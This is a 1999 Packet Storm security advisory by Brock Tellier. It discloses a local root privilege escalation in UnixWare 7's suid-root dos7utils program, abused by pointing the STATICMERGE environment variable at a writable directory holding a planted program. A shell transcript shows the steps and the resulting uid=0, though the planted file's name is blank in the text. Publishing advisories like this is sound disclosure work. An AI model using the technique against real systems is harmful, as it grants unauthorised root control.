Type packetstorm
Reporter Packet Storm
Modified 1999-10-06T00:00:00


A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by  
default) which allows any user to execute any command as root. The dos7utils  
program gets its exec path from the environment variable  
STATICMERGE. By setting this to a directory writable by us and setting the -f  
switch, we can have dos7utils run our program as follows:  
bash-2.02$ uname -a; id; pwd  
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5  
uid=101(xnec) gid=1(other)  
bash-2.02$ export STATICMERGE=/tmp  
bash-2.02$ cat > /tmp/  
bash-2.02$ chmod 700 /tmp/   
bash-2.02$ ./dos7utils -f bah  
uid=0(root) gid=1(other)  
Searching through the securityfocus vulnerability archives yields 0 matches  
for search string "unixware", but several for "openserver". I thought this  
was rather strange, considering that SCO is discontinuing OpenServer after  
5.0.5 in favor of the much more reliable (though not security-wise, evidently)  
UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my  
incomplete audit of SCO 5.0.5.  
Brock Tellier  
UNIX Systems Administrator  
Get free email and a permanent address at